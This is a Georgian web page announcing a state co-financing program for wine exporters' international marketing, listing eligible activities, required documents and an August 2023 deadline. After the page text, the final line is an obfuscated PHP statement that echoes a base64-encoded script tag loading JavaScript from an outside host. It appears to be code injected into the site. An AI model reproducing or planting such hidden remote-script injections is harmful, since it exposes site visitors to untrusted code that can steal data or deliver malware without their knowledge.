celsiusi
ავერსი საქკაბელი

თუ ხარ მეწარმე და საერთაშორისო ბაზრებზე ქართული ღვინის ექსპორტს და მარკეტინგულ ღონისძიებებს ახორციელებ, ქართული ღვინის პოპულურაზიციის ხელშეწყობის სახელმწიფო პროგრამის ფარგლებში, შეგიძლია 600 000 ლარამდე თანადაფინანსება მიიღო.

პროგრამაში მონაწილეობისათვის აუცილებელია, ღვინის ექსპორტის მოცულობა და მარკეტინგული ხარჯი მიმდინარე წელს იყოს იმაზე მეტი, ვიდრე წინა წელს.

იმ შემთხვევაში, თუ წინა კალენდარული წლის და საანგარიშო პერიოდში გაწეული არ არის მარკეტინგული ხარჯი და განხორციელებული არ არის ღვინის ექსპორტი, გათვალისწინებული იქნება გასული 3 წლის განმავლობაში ბოლოს გაწეული მარკეტინგული ხარჯი და ექსპორტირებული ღვინის მოცულობა.

ქართული ღვინის პოპულურაზიციის ხელშეწყობის სახელმწიფო პროგრამა ითვალისწინებს შემდეგი მიზნობრიობებით გაწეული მარკეტინგული აქტივობების თანადაფინანსებას:

ქსელური ტიპის ობიექტებში მარკეტინგული ღონისძიებები
ღვინის მაღაზიებში თაროების ბრენდირება, სავაჭრო ობიექტების კატალოგში განთავსება, დეგუსტაციები
ღვინის მაღაზიებში პროდუქციის სწორი პოზიციონირებისათვის საერთაშორისო კომპანიების დაქირავება
მედიაკამპანიები, მედიასაშუალებებში და ღვინის გაყიდვების ონლაინ ფლატფორმებზე პროდუქტის რეკლამირება
ქართული ღვინის პოპულარიზაციის ღონისძიებებში მონაწილეობა
რეკლამა სოციალურ ქსელებში.

პროგრამაში მონაწილეობის მისაღებად, პირველ ეტაპზე, საჭიროა 2023 წლის 1 აგვისტომდე წარმოადგინოთ:

▪️შევსებული განაცხადის ფორმა
▪️პირადობის დამადასტურებელი დოკუმენტის ასლი
▪️ცნობა შემოსავლების სამსახურიდან საგადასახადო დავალიანების არ ქონის შესახებ
▪️საბანკო რეკვიზიტები

განაცხადები მიიღება ელექტრონულად (ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript.) ან ღვინის ეროვნულ სააგენტოში წარდგენით (მისამართი: მარშალ გელოვანის გამზირი N6)
დამატებითი ინფორმაციისთვის ეწვიეთ ღვინის ეროვნული სააგენტოს ოფიციალურ ვებგვერდს

508
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");